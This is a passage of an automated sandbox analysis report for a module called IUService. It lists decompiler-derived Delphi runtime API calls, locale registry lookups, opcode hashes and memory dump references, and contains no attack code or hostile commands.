                                                                                                                                            • Snapshot File: hcaresult_34_2_50000000_IUService.jbxd
                                                                                                                                            Yara matches
                                                                                                                                            Similarity
                                                                                                                                            • API ID: System@Unicode$Stringx20System@@$Asg$qqrr20Cat3$qqrr20StringStringt2
                                                                                                                                            • String ID: Any$Array $ByRef $String$UnicodeString
                                                                                                                                            • API String ID: 2201327990-2617011621
                                                                                                                                            • Opcode ID: 2c48cb2b966e9eb535af4dc705276307beba80cf27b90786bbe315e30b6060d6
                                                                                                                                            • Instruction ID: ebc111c00f9f3ce4b2f0d66ad6076afb76b8f2783d8abbf171bc1124b3b59010
                                                                                                                                            • Opcode Fuzzy Hash: 2c48cb2b966e9eb535af4dc705276307beba80cf27b90786bbe315e30b6060d6
                                                                                                                                            • Instruction Fuzzy Hash: 4E21F7347055D0AFEF12EAD8D851BDAB3DAEF9A710FA04713BA0097386C6789E01C691
                                                                                                                                            APIs
                                                                                                                                            • @System@SysGetMem$qqri.RTL120 ref: 50002B40
                                                                                                                                            • @System@SysFreeMem$qqrpv.RTL120 ref: 50002B58
                                                                                                                                            • @System@SysGetMem$qqri.RTL120 ref: 50002B76
                                                                                                                                            • @System@SysFreeMem$qqrpv.RTL120 ref: 50002B9C
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 00000022.00000002.2346383362.0000000050001000.00000020.00000001.01000000.0000000E.sdmp, Offset: 50000000, based on PE: true
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_34_2_50000000_IUService.jbxd
                                                                                                                                            Yara matches
                                                                                                                                            Similarity
                                                                                                                                            • API ID: System@$FreeMem$qqriMem$qqrpv
                                                                                                                                            • String ID:
                                                                                                                                            • API String ID: 1065326172-0
                                                                                                                                            • Opcode ID: 07fe07600e9fc5acced1606dc5d0384102eb1ac5b07c89382bdbf1b765f8db2c
                                                                                                                                            • Instruction ID: 109219bf6a90ecac94eeb607d3392a2891908dbfbfbb0241e4c678e92fbbb21d
                                                                                                                                            • Opcode Fuzzy Hash: 07fe07600e9fc5acced1606dc5d0384102eb1ac5b07c89382bdbf1b765f8db2c
                                                                                                                                            • Instruction Fuzzy Hash: 48C10762700A814BF7159ABC9CA57ADB3D19BD4221F98833EE614CB396DAB4EC458381
                                                                                                                                            APIs
                                                                                                                                            • @Sysutils@ExtractFileDrive$qqrx20System@UnicodeString.RTL120(00000000,5001D2CD,?,?,?,?,00000004,00000000,00000000), ref: 5001D15E
                                                                                                                                            • @Sysutils@ExtractFileDrive$qqrx20System@UnicodeString.RTL120(?,00000000,5001D2CD,?,?,?,?,00000004,00000000,00000000), ref: 5001D16C
                                                                                                                                            • @Sysutils@SameFileName$qqrx20System@UnicodeStringt1.RTL120(00000000,5001D2CD,?,?,?,?,00000004,00000000,00000000), ref: 5001D175
                                                                                                                                            • @System@UniqueString$qqrr20System@UnicodeString.RTL120(00000000,5001D2CD,?,?,?,?,00000004,00000000,00000000), ref: 5001D18F
                                                                                                                                            • @System@UniqueString$qqrr20System@UnicodeString.RTL120(00000000,5001D2CD,?,?,?,?,00000004,00000000,00000000), ref: 5001D1A2
                                                                                                                                            • @System@@UStrFromPWChar$qqrr20System@UnicodeStringpb.RTL120(00000000,5001D2CD,?,?,?,?,00000004,00000000,00000000), ref: 5001D1EA
                                                                                                                                            • @System@@UStrFromPWChar$qqrr20System@UnicodeStringpb.RTL120(?,00000000,5001D2CD,?,?,?,?,00000004,00000000,00000000), ref: 5001D1F8
                                                                                                                                            • @Sysutils@SameFileName$qqrx20System@UnicodeStringt1.RTL120(00000000,5001D2CD,?,?,?,?,00000004,00000000,00000000), ref: 5001D201
                                                                                                                                            • @System@@UStrAsg$qqrr20System@UnicodeStringx20System@UnicodeString.RTL120(00000000,5001D2CD,?,?,?,?,00000004,00000000,00000000), ref: 5001D20E
                                                                                                                                            • @System@@UStrCatN$qqrv.RTL120(5001D2FC,5001D2E8,00000004,00000000,5001D2CD,?,?,?,?,00000004,00000000,00000000), ref: 5001D22C
                                                                                                                                            • @System@@UStrFromPWChar$qqrr20System@UnicodeStringpb.RTL120(00000004,00000000,5001D2CD,?,?,?,?,00000004,00000000,00000000), ref: 5001D250
                                                                                                                                            • @System@@UStrCatN$qqrv.RTL120(5001D2FC,?,00000004,00000000,5001D2CD,?,?,?,?,00000004,00000000,00000000), ref: 5001D264
                                                                                                                                            • @System@@UStrFromPWChar$qqrr20System@UnicodeStringpb.RTL120(00000000,5001D2CD,?,?,?,?,00000004,00000000,00000000), ref: 5001D275
                                                                                                                                            • @System@@UStrCat$qqrr20System@UnicodeStringx20System@UnicodeString.RTL120(00000000,5001D2CD,?,?,?,?,00000004,00000000,00000000), ref: 5001D27F
                                                                                                                                              • Part of subcall function 5001D100: @Sysutils@AnsiStrScan$qqrpbb.RTL120(00000004,?,5001D1B5,00000000,5001D2CD,?,?,?,?,00000004,00000000,00000000), ref: 5001D110
                                                                                                                                            • @Sysutils@ExtractFileName$qqrx20System@UnicodeString.RTL120(00000000,5001D2CD,?,?,?,?,00000004,00000000,00000000), ref: 5001D28A
                                                                                                                                              • Part of subcall function 5001C8E4: @Sysutils@LastDelimiter$qqrx20System@UnicodeStringt1.RTL120(?,?,?,5001C5CC,00000000,5001C600,?,?,?,?,00000000,00000000), ref: 5001C8F2
                                                                                                                                              • Part of subcall function 5001C8E4: @System@@UStrCopy$qqrx20System@UnicodeStringii.RTL120(?,?,?,?,5001C5CC,00000000,5001C600,?,?,?,?,00000000,00000000), ref: 5001C904
                                                                                                                                            • @System@@UStrCat$qqrr20System@UnicodeStringx20System@UnicodeString.RTL120(00000000,5001D2CD,?,?,?,?,00000004,00000000,00000000), ref: 5001D294
                                                                                                                                              • Part of subcall function 5000A164: @System@@UStrSetLength$qqrr20System@UnicodeStringi.RTL120 ref: 5000A18D
                                                                                                                                              • Part of subcall function 5000A164: @System@@UStrAsg$qqrr20System@UnicodeStringx20System@UnicodeString.RTL120(00000000), ref: 5000A1A4
                                                                                                                                              • Part of subcall function 5000A164: @System@Move$qqrpxvpvi.RTL120(00000000), ref: 5000A1B7
                                                                                                                                              • Part of subcall function 5000A164: @System@@LStrClr$qqrpv.RTL120(00000000), ref: 5000A1C4
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 00000022.00000002.2346383362.0000000050001000.00000020.00000001.01000000.0000000E.sdmp, Offset: 50000000, based on PE: true
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_34_2_50000000_IUService.jbxd
                                                                                                                                            Yara matches
                                                                                                                                            Similarity
                                                                                                                                            • API ID: System@$Unicode$System@@$String$Sysutils@$File$Char$qqrr20FromStringpbStringx20$ExtractName$qqrx20Stringt1$Asg$qqrr20Cat$qqrr20Drive$qqrx20N$qqrvSameString$qqrr20Unique$AnsiClr$qqrpvCopy$qqrx20Delimiter$qqrx20LastLength$qqrr20Move$qqrpxvpviScan$qqrpbbStringiStringii
                                                                                                                                            • String ID:
                                                                                                                                            • API String ID: 178390892-0
                                                                                                                                            • Opcode ID: 5cf03c4f51f339b5190f70d2a39a3b1a4e70701528fcd71156b8032a35829f8d
                                                                                                                                            • Instruction ID: 482c5ae77d457f58d2c42465c16c4b49129206617ce66a2e08880273dab9e065
                                                                                                                                            • Opcode Fuzzy Hash: 5cf03c4f51f339b5190f70d2a39a3b1a4e70701528fcd71156b8032a35829f8d
                                                                                                                                            • Instruction Fuzzy Hash: 26414234A01A99ABDB01DBD4EC91ADEB3B5EF68200F504637F510A3241DB74DE868B91
                                                                                                                                            APIs
                                                                                                                                            • @System@@InternalUStrFromLStr$qqrr20System@UnicodeStringx27System@%AnsiStringT$us$i0$%.RTL120(00000000,500298F5), ref: 50029676
                                                                                                                                              • Part of subcall function 50008994: @System@@UStrFromLStr$qqrr20System@UnicodeStringx27System@%AnsiStringT$us$i0$%.RTL120(?,500089BC,50006B15,00000000,50006B69), ref: 50008999
                                                                                                                                            • @System@@InternalUStrFromLStr$qqrr20System@UnicodeStringx27System@%AnsiStringT$us$i0$%.RTL120(00000000,500298F5), ref: 5002969F
                                                                                                                                            • @System@@UStrAsg$qqrr20System@UnicodeStringx20System@UnicodeString.RTL120(00000000,500298F5), ref: 500296B5
                                                                                                                                            • @System@@InternalUStrFromLStr$qqrr20System@UnicodeStringx27System@%AnsiStringT$us$i0$%.RTL120(00000000,500298F5), ref: 500296DB
                                                                                                                                            • @Sysutils@CharLength$qqrx20System@UnicodeStringi.RTL120(00000000,500298F5), ref: 500296FA
                                                                                                                                            • @System@@InternalUStrFromLStr$qqrr20System@UnicodeStringx27System@%AnsiStringT$us$i0$%.RTL120(00000000,500298F5), ref: 50029764
                                                                                                                                            • @System@@UStrToPWChar$qqrx20System@UnicodeString.RTL120(00000000,500298F5), ref: 50029777
                                                                                                                                            • @Sysutils@StrLComp$qqrpxbt1ui.RTL120(00000000,500298F5), ref: 50029786
                                                                                                                                            • @System@@UStrCopy$qqrx20System@UnicodeStringii.RTL120(?,00000000,500298F5), ref: 5002980F
                                                                                                                                            • @System@@UStrCat$qqrr20System@UnicodeStringx20System@UnicodeString.RTL120(?,00000000,500298F5), ref: 5002981A
                                                                                                                                            • @Sysutils@StrLComp$qqrpxbt1ui.RTL120(?,00000000,500298F5), ref: 50029864
                                                                                                                                            • @System@@UStrCat$qqrr20System@UnicodeStringx20System@UnicodeString.RTL120(?,00000000,500298F5), ref: 5002988A
                                                                                                                                            • @System@@UStrCopy$qqrx20System@UnicodeStringii.RTL120(?,00000000,500298F5), ref: 500298BA
                                                                                                                                            • @System@@UStrCat$qqrr20System@UnicodeStringx20System@UnicodeString.RTL120(?,00000000,500298F5), ref: 500298C5
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 00000022.00000002.2346383362.0000000050001000.00000020.00000001.01000000.0000000E.sdmp, Offset: 50000000, based on PE: true
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_34_2_50000000_IUService.jbxd
                                                                                                                                            Yara matches
                                                                                                                                            Similarity
                                                                                                                                            • API ID: System@Unicode$System@@$String$AnsiFromStr$qqrr20Stringx27System@%T$us$i0$%$InternalStringx20$Cat$qqrr20Sysutils@$Comp$qqrpxbt1uiCopy$qqrx20Stringii$Asg$qqrr20CharChar$qqrx20Length$qqrx20Stringi
                                                                                                                                            • String ID:
                                                                                                                                            • API String ID: 873705688-0
                                                                                                                                            • Opcode ID: 253641eb34a4d143ab3a2581e42b7379e36710be684173b05d6945abe8d2afe8
                                                                                                                                            • Instruction ID: be51fb8424686403522dc7b40415ecc70bc72e8b18d73c36ef70b9aef3598e1a
                                                                                                                                            • Opcode Fuzzy Hash: 253641eb34a4d143ab3a2581e42b7379e36710be684173b05d6945abe8d2afe8
                                                                                                                                            • Instruction Fuzzy Hash: 24A13934D1228A9FDF00DFA8E985AEEB7F1FF49300FA44266E404A7251D7749E81CB94
                                                                                                                                            APIs
                                                                                                                                            • @System@ParamCount$qqrv.RTL120(00000000,50029B78), ref: 50029994
                                                                                                                                              • Part of subcall function 500046CC: GetCommandLineW.KERNEL32(00000000,5000471D,?,?,?,00000000), ref: 500046E3
                                                                                                                                            • @System@ParamStr$qqri.RTL120(00000000,50029B78), ref: 500299AD
                                                                                                                                              • Part of subcall function 5000472C: @System@@UStrAsg$qqrr20System@UnicodeStringx20System@UnicodeString.RTL120 ref: 5000473D
                                                                                                                                              • Part of subcall function 5000472C: GetModuleFileNameW.KERNEL32(00000000,?,00000105), ref: 50004752
                                                                                                                                              • Part of subcall function 5000472C: @System@@UStrFromPWCharLen$qqrr20System@UnicodeStringpbi.RTL120(00000000,?,00000105), ref: 5000475D
                                                                                                                                            • @System@@SetEq$qqrv.RTL120(00000000,50029B78), ref: 500299BB
                                                                                                                                            • @System@@UStrCopy$qqrx20System@UnicodeStringii.RTL120(?,00000000,50029B78), ref: 500299F5
                                                                                                                                            • @System@@UStrLAsg$qqrr20System@UnicodeStringx20System@UnicodeString.RTL120(?,00000000,50029B78), ref: 50029A00
                                                                                                                                            • @System@@InternalUStrFromLStr$qqrr20System@UnicodeStringx27System@%AnsiStringT$us$i0$%.RTL120(?,00000000,50029B78), ref: 50029A1D
                                                                                                                                            • @System@@InternalUStrFromLStr$qqrr20System@UnicodeStringx27System@%AnsiStringT$us$i0$%.RTL120(?,00000000,50029B78), ref: 50029A4E
                                                                                                                                            • @System@@UStrToPWChar$qqrx20System@UnicodeString.RTL120(00000000,?,00000000,50029B78), ref: 50029A6E
                                                                                                                                            • @System@@UStrToPWChar$qqrx20System@UnicodeString.RTL120(00000000,00000000,00000000,?,00000000,50029B78), ref: 50029A7B
                                                                                                                                            • CompareStringW.KERNEL32(00000400,00000001,00000000,00000000,00000000,00000000,?,00000000,50029B78), ref: 50029A88
                                                                                                                                            • @System@@UStrCopy$qqrx20System@UnicodeStringii.RTL120(?,00000000,50029B78), ref: 50029AB0
                                                                                                                                            • @System@@UStrLAsg$qqrr20System@UnicodeStringx20System@UnicodeString.RTL120(?,00000000,50029B78), ref: 50029ABB
                                                                                                                                            • @System@@InternalUStrFromLStr$qqrr20System@UnicodeStringx27System@%AnsiStringT$us$i0$%.RTL120(?,00000000,50029B78), ref: 50029AD8
                                                                                                                                            • @System@@InternalUStrFromLStr$qqrr20System@UnicodeStringx27System@%AnsiStringT$us$i0$%.RTL120(?,00000000,50029B78), ref: 50029B09
                                                                                                                                            • @System@@UStrToPWChar$qqrx20System@UnicodeString.RTL120(00000000,?,00000000,50029B78), ref: 50029B29
                                                                                                                                            • @System@@UStrToPWChar$qqrx20System@UnicodeString.RTL120(00000000,00000000,00000000,?,00000000,50029B78), ref: 50029B36
                                                                                                                                            • CompareStringW.KERNEL32(00000400,00000000,00000000,00000000,00000000,00000000,?,00000000,50029B78), ref: 50029B43
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 00000022.00000002.2346383362.0000000050001000.00000020.00000001.01000000.0000000E.sdmp, Offset: 50000000, based on PE: true
• Associated: 00000022.00000002.2346348283.0000000050000000.00000002.00000001.01000000.0000000E.sdmp
• Associated: 00000022.00000002.2347614191.000000005009C000.00000004.00000001.01000000.0000000E.sdmp
• Associated: 00000022.00000002.2347666251.000000005009D000.00000008.00000001.01000000.0000000E.sdmp
• Associated: 00000022.00000002.2347844466.00000000500AA000.00000004.00000001.01000000.0000000E.sdmp
• Associated: 00000022.00000002.2347882113.00000000500AB000.00000008.00000001.01000000.0000000E.sdmp
• Associated: 00000022.00000002.2347930538.00000000500AD000.00000002.00000001.01000000.0000000E.sdmp
• Associated: 00000022.00000002.2347930538.00000000500FD000.00000002.00000001.01000000.0000000E.sdmp
• Associated: 00000022.00000002.2347930538.0000000050113000.00000002.00000001.01000000.0000000E.sdmp
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_34_2_50000000_IUService.jbxd
                                                                                                                                            Yara matches
                                                                                                                                            Similarity
                                                                                                                                            • API ID: System@$Unicode$System@@$String$From$AnsiChar$qqrx20InternalStr$qqrr20Stringx27System@%T$us$i0$%$Asg$qqrr20Stringx20$CompareCopy$qqrx20ParamStringii$CharCommandCount$qqrvEq$qqrvFileLen$qqrr20LineModuleNameStr$qqriStringpbi
                                                                                                                                            • String ID:
                                                                                                                                            • API String ID: 3651759711-0
                                                                                                                                            APIs
                                                                                                                                            • @System@@UStrToPWChar$qqrx20System@UnicodeString.RTL120(00000000,5001AA7C), ref: 5001A921
                                                                                                                                            • @Sysutils@AnsiStrScan$qqrpbb.RTL120(00000000,5001AA7C), ref: 5001A92A
                                                                                                                                            • @Sysutils@AnsiStrScan$qqrpbb.RTL120(00000000,5001AA7C), ref: 5001A93F
                                                                                                                                            • @System@@UStrFromWChar$qqrr20System@UnicodeStringb.RTL120(00000000,5001AA7C), ref: 5001A955
                                                                                                                                            • @System@@UStrFromWChar$qqrr20System@UnicodeStringb.RTL120(?,?,00000000,5001AA7C), ref: 5001A967
                                                                                                                                            • @System@@UStrCatN$qqrv.RTL120(?,?,?,00000000,5001AA7C), ref: 5001A976
                                                                                                                                            • @System@@InternalUStrFromLStr$qqrr20System@UnicodeStringx27System@%AnsiStringT$us$i0$%.RTL120(00000000,5001AA7C), ref: 5001A998
                                                                                                                                            • @System@@UStrSetLength$qqrr20System@UnicodeStringi.RTL120(00000000,5001AA7C), ref: 5001A9AC
                                                                                                                                            • @System@@UStrToPWChar$qqrx20System@UnicodeString.RTL120(00000000,5001AA7C), ref: 5001A9B3
                                                                                                                                            • @System@@UStrToPWChar$qqrx20System@UnicodeString.RTL120(00000000,5001AA7C), ref: 5001A9C7
                                                                                                                                            • @Sysutils@AnsiStrScan$qqrpbb.RTL120(00000000,5001AA7C), ref: 5001A9D4
                                                                                                                                            • @System@Move$qqrpxvpvi.RTL120(00000000,5001AA7C), ref: 5001A9F1
                                                                                                                                            • @Sysutils@AnsiStrScan$qqrpbb.RTL120(00000000,5001AA7C), ref: 5001AA17
                                                                                                                                            • @Sysutils@StrEnd$qqrpxb.RTL120(00000000,5001AA7C), ref: 5001AA24
                                                                                                                                            • @System@Move$qqrpxvpvi.RTL120(00000000,5001AA7C), ref: 5001AA3E
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 00000022.00000002.2346383362.0000000050001000.00000020.00000001.01000000.0000000E.sdmp, Offset: 50000000, based on PE: true
• Associated: 00000022.00000002.2346348283.0000000050000000.00000002.00000001.01000000.0000000E.sdmp
• Associated: 00000022.00000002.2347614191.000000005009C000.00000004.00000001.01000000.0000000E.sdmp
• Associated: 00000022.00000002.2347666251.000000005009D000.00000008.00000001.01000000.0000000E.sdmp
• Associated: 00000022.00000002.2347844466.00000000500AA000.00000004.00000001.01000000.0000000E.sdmp
• Associated: 00000022.00000002.2347882113.00000000500AB000.00000008.00000001.01000000.0000000E.sdmp
• Associated: 00000022.00000002.2347930538.00000000500AD000.00000002.00000001.01000000.0000000E.sdmp
• Associated: 00000022.00000002.2347930538.00000000500FD000.00000002.00000001.01000000.0000000E.sdmp
• Associated: 00000022.00000002.2347930538.0000000050113000.00000002.00000001.01000000.0000000E.sdmp
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_34_2_50000000_IUService.jbxd
                                                                                                                                            Yara matches
                                                                                                                                            Similarity
                                                                                                                                            • API ID: System@$System@@$Unicode$AnsiSysutils@$Scan$qqrpbbString$Char$qqrx20From$Char$qqrr20Move$qqrpxvpviStringb$End$qqrpxbInternalLength$qqrr20N$qqrvStr$qqrr20StringiStringx27System@%T$us$i0$%
                                                                                                                                            • String ID:
                                                                                                                                            • API String ID: 3100482041-0
                                                                                                                                            APIs
                                                                                                                                            • @Sysutils@AnsiUpperCase$qqrx20System@UnicodeString.RTL120(00000000,500295F1), ref: 5002948C
                                                                                                                                              • Part of subcall function 50019EBC: @System@@InternalUStrFromLStr$qqrr20System@UnicodeStringx27System@%AnsiStringT$us$i0$%.RTL120(00000000,50019F40,?,?,?,?,?,500154E1,00000000,5001551A,?,?,?,00000000,00000000), ref: 50019EF5
                                                                                                                                              • Part of subcall function 50019EBC: @System@@UStrToPWChar$qqrx20System@UnicodeString.RTL120(00000000,50019F40,?,?,?,?,?,500154E1,00000000,5001551A,?,?,?,00000000,00000000), ref: 50019F08
                                                                                                                                              • Part of subcall function 50019EBC: @System@@UStrFromPWCharLen$qqrr20System@UnicodeStringpbi.RTL120(00000000,50019F40,?,?,?,?,?,500154E1,00000000,5001551A,?,?,?,00000000,00000000), ref: 50019F13
                                                                                                                                              • Part of subcall function 50019EBC: @System@@UStrToPWChar$qqrx20System@UnicodeString.RTL120(?,00000000,50019F40,?,?,?,?,?,500154E1,00000000,5001551A,?,?,?,00000000,00000000), ref: 50019F1F
                                                                                                                                              • Part of subcall function 50019EBC: CharUpperBuffW.USER32(00000000,?,00000000,50019F40,?,?,?,?,?,500154E1,00000000,5001551A,?,?,?,00000000), ref: 50019F25
                                                                                                                                            • @Sysutils@AnsiUpperCase$qqrx20System@UnicodeString.RTL120(00000000,500295F1), ref: 50029497
                                                                                                                                            • @System@@UStrLAsg$qqrr20System@UnicodeStringx20System@UnicodeString.RTL120(00000000,500295F1), ref: 500294A3
                                                                                                                                            • @System@@UStrLAsg$qqrr20System@UnicodeStringx20System@UnicodeString.RTL120(00000000,500295F1), ref: 500294AE
                                                                                                                                            • @System@@UStrLAsg$qqrr20System@UnicodeStringx20System@UnicodeString.RTL120(00000000,500295F1), ref: 500294B8
                                                                                                                                            • @System@@UStrAsg$qqrr20System@UnicodeStringx20System@UnicodeString.RTL120(00000000,500295F1), ref: 500294C2
                                                                                                                                            • @Sysutils@AnsiPos$qqrx20System@UnicodeStringt1.RTL120(00000000,500295F1), ref: 500294D2
                                                                                                                                              • Part of subcall function 50028754: @System@@InternalUStrFromLStr$qqrr20System@UnicodeStringx27System@%AnsiStringT$us$i0$%.RTL120(00000000,50028822), ref: 5002879B
                                                                                                                                              • Part of subcall function 50028754: @System@@InternalUStrFromLStr$qqrr20System@UnicodeStringx27System@%AnsiStringT$us$i0$%.RTL120(00000000,50028822), ref: 500287C3
                                                                                                                                              • Part of subcall function 50028754: @System@@UStrToPWChar$qqrx20System@UnicodeString.RTL120(?,00000000,50028822), ref: 500287D7
                                                                                                                                              • Part of subcall function 50028754: @System@@UStrToPWChar$qqrx20System@UnicodeString.RTL120(00000000,?,00000000,50028822), ref: 500287E0
                                                                                                                                              • Part of subcall function 50028754: @System@@UStrToPWChar$qqrx20System@UnicodeString.RTL120(?,00000000,50028822), ref: 500287F6
                                                                                                                                            • @System@@UStrCat$qqrr20System@UnicodeStringx20System@UnicodeString.RTL120(00000000,500295F1), ref: 500294E3
                                                                                                                                              • Part of subcall function 5000A164: @System@@UStrSetLength$qqrr20System@UnicodeStringi.RTL120 ref: 5000A18D
                                                                                                                                              • Part of subcall function 5000A164: @System@@UStrAsg$qqrr20System@UnicodeStringx20System@UnicodeString.RTL120(00000000), ref: 5000A1A4
                                                                                                                                              • Part of subcall function 5000A164: @System@Move$qqrpxvpvi.RTL120(00000000), ref: 5000A1B7
                                                                                                                                              • Part of subcall function 5000A164: @System@@LStrClr$qqrpv.RTL120(00000000), ref: 5000A1C4
                                                                                                                                            • @System@@UStrCopy$qqrx20System@UnicodeStringii.RTL120(?,00000000,00000000,500295F1), ref: 50029504
                                                                                                                                            • @System@@UStrCatN$qqrv.RTL120(?,?,?,00000000,00000000,500295F1), ref: 50029517
                                                                                                                                            • @System@@InternalUStrFromLStr$qqrr20System@UnicodeStringx27System@%AnsiStringT$us$i0$%.RTL120(?,?,?,00000000,00000000,500295F1), ref: 50029534
                                                                                                                                            • @System@@UStrCopy$qqrx20System@UnicodeStringii.RTL120(?,?,?,?,00000000,00000000,500295F1), ref: 50029560
                                                                                                                                            • @System@@UStrCat$qqrr20System@UnicodeStringx20System@UnicodeString.RTL120(?,?,?,?,00000000,00000000,500295F1), ref: 50029571
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 00000022.00000002.2346383362.0000000050001000.00000020.00000001.01000000.0000000E.sdmp, Offset: 50000000, based on PE: true
• Associated: 00000022.00000002.2346348283.0000000050000000.00000002.00000001.01000000.0000000E.sdmp
• Associated: 00000022.00000002.2347614191.000000005009C000.00000004.00000001.01000000.0000000E.sdmp
• Associated: 00000022.00000002.2347666251.000000005009D000.00000008.00000001.01000000.0000000E.sdmp
• Associated: 00000022.00000002.2347844466.00000000500AA000.00000004.00000001.01000000.0000000E.sdmp
• Associated: 00000022.00000002.2347882113.00000000500AB000.00000008.00000001.01000000.0000000E.sdmp
• Associated: 00000022.00000002.2347930538.00000000500AD000.00000002.00000001.01000000.0000000E.sdmp
• Associated: 00000022.00000002.2347930538.00000000500FD000.00000002.00000001.01000000.0000000E.sdmp
• Associated: 00000022.00000002.2347930538.0000000050113000.00000002.00000001.01000000.0000000E.sdmp
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_34_2_50000000_IUService.jbxd
                                                                                                                                            Yara matches
                                                                                                                                            Similarity
                                                                                                                                            • API ID: System@$Unicode$System@@$String$AnsiStringx20$Asg$qqrr20Char$qqrx20From$InternalStr$qqrr20Stringx27System@%T$us$i0$%$Sysutils@Upper$Case$qqrx20Cat$qqrr20CharCopy$qqrx20Stringii$BuffClr$qqrpvLen$qqrr20Length$qqrr20Move$qqrpxvpviN$qqrvPos$qqrx20StringiStringpbiStringt1
                                                                                                                                            • String ID:
                                                                                                                                            • API String ID: 2621940507-0
                                                                                                                                            APIs
                                                                                                                                            • @System@@UStrAsg$qqrr20System@UnicodeStringx20System@UnicodeString.RTL120(00000000,5001D4A4), ref: 5001D366
                                                                                                                                            • @System@@InternalUStrFromLStr$qqrr20System@UnicodeStringx27System@%AnsiStringT$us$i0$%.RTL120(00000000,5001D4A4), ref: 5001D394
                                                                                                                                              • Part of subcall function 50008994: @System@@UStrFromLStr$qqrr20System@UnicodeStringx27System@%AnsiStringT$us$i0$%.RTL120(?,500089BC,50006B15,00000000,50006B69), ref: 50008999
                                                                                                                                            • @Sysutils@FileExists$qqrx20System@UnicodeString.RTL120(00000000,5001D4A4), ref: 5001D3A9
                                                                                                                                            • @System@@EnsureUnicodeString$qqrr20System@UnicodeString.RTL120(?,00000000,5001D4A4), ref: 5001D3C0
                                                                                                                                            • @System@@InternalUStrFromLStr$qqrr20System@UnicodeStringx27System@%AnsiStringT$us$i0$%.RTL120(?,00000000,5001D4A4), ref: 5001D3F2
                                                                                                                                            • @Sysutils@NextCharIndex$qqrx20System@UnicodeStringi.RTL120(?,00000000,5001D4A4), ref: 5001D410
                                                                                                                                            • @System@@EnsureUnicodeString$qqrr20System@UnicodeString.RTL120(?,00000000,5001D4A4), ref: 5001D421
                                                                                                                                            • @System@@UStrCopy$qqrx20System@UnicodeStringii.RTL120(?,00000000,5001D4A4), ref: 5001D43D
                                                                                                                                            • @Sysutils@AnsiLastChar$qqrx20System@UnicodeString.RTL120(?,00000000,5001D4A4), ref: 5001D447
                                                                                                                                            • @System@@UStrCat$qqrr20System@UnicodeStringx20System@UnicodeString.RTL120(?,?,00000000,5001D4A4), ref: 5001D469
                                                                                                                                            • @System@@UStrCat$qqrr20System@UnicodeStringx20System@UnicodeString.RTL120(?,00000000,5001D4A4), ref: 5001D477
                                                                                                                                            • @System@@UStrAsg$qqrr20System@UnicodeStringx20System@UnicodeString.RTL120(00000000,5001D4A4), ref: 5001D489
                                                                                                                                            Strings
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 00000022.00000002.2346383362.0000000050001000.00000020.00000001.01000000.0000000E.sdmp, Offset: 50000000, based on PE: true
• Associated: 00000022.00000002.2346348283.0000000050000000.00000002.00000001.01000000.0000000E.sdmp
• Associated: 00000022.00000002.2347614191.000000005009C000.00000004.00000001.01000000.0000000E.sdmp
• Associated: 00000022.00000002.2347666251.000000005009D000.00000008.00000001.01000000.0000000E.sdmp
• Associated: 00000022.00000002.2347844466.00000000500AA000.00000004.00000001.01000000.0000000E.sdmp
• Associated: 00000022.00000002.2347882113.00000000500AB000.00000008.00000001.01000000.0000000E.sdmp
• Associated: 00000022.00000002.2347930538.00000000500AD000.00000002.00000001.01000000.0000000E.sdmp
• Associated: 00000022.00000002.2347930538.00000000500FD000.00000002.00000001.01000000.0000000E.sdmp
• Associated: 00000022.00000002.2347930538.0000000050113000.00000002.00000001.01000000.0000000E.sdmp
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_34_2_50000000_IUService.jbxd
                                                                                                                                            Similarity
                                                                                                                                            • API ID: Unicode$System@$String$System@@$AnsiStringx20$FromStr$qqrr20Stringx27System@%Sysutils@T$us$i0$%$Asg$qqrr20Cat$qqrr20EnsureInternalString$qqrr20$CharChar$qqrx20Copy$qqrx20Exists$qqrx20FileIndex$qqrx20LastNextStringiStringii
                                                                                                                                            • String ID: \
                                                                                                                                            • API String ID: 1823336666-2967466578
                                                                                                                                            • Opcode ID: df0ab2c0c2f59ba5373b8656c7223b6ccec50d516bfc707d398026b4c07643d9
                                                                                                                                            • Instruction ID: 6d0a0c84b3d9e99a300f93f86f148e16fca29f9739a9876171c5e92ec0c1f276
                                                                                                                                            • Opcode Fuzzy Hash: df0ab2c0c2f59ba5373b8656c7223b6ccec50d516bfc707d398026b4c07643d9
                                                                                                                                            • Instruction Fuzzy Hash: 2C417134E00989DFDB10EFA8D99289EB3F1EF44300B5082A7E510E7221D770AF86D791
                                                                                                                                            APIs
                                                                                                                                            • @System@@UStrAsg$qqrr20System@UnicodeStringx20System@UnicodeString.RTL120(00000000,5002A8E2), ref: 5002A7B7
                                                                                                                                            • @System@LoadResourceModule$qqrpbo.RTL120(00000000,5002A8E2), ref: 5002A7C4
                                                                                                                                              • Part of subcall function 5000C58C: GetModuleFileNameW.KERNEL32(00000000,?,00000105,50120000,50242008), ref: 5000C5A8
                                                                                                                                              • Part of subcall function 5000C58C: RegOpenKeyExW.ADVAPI32(80000001,Software\CodeGear\Locales,00000000,000F0019,?,00000000,?,00000105,50120000,50242008), ref: 5000C5C8
                                                                                                                                              • Part of subcall function 5000C58C: RegOpenKeyExW.ADVAPI32(80000002,Software\CodeGear\Locales,00000000,000F0019,?,80000001,Software\CodeGear\Locales,00000000,000F0019,?,00000000,?,00000105,50120000,50242008), ref: 5000C5E6
                                                                                                                                              • Part of subcall function 5000C58C: RegOpenKeyExW.ADVAPI32(80000001,Software\Borland\Locales,00000000,000F0019,?,80000002,Software\CodeGear\Locales,00000000,000F0019,?,80000001,Software\CodeGear\Locales,00000000,000F0019,?,00000000), ref: 5000C604
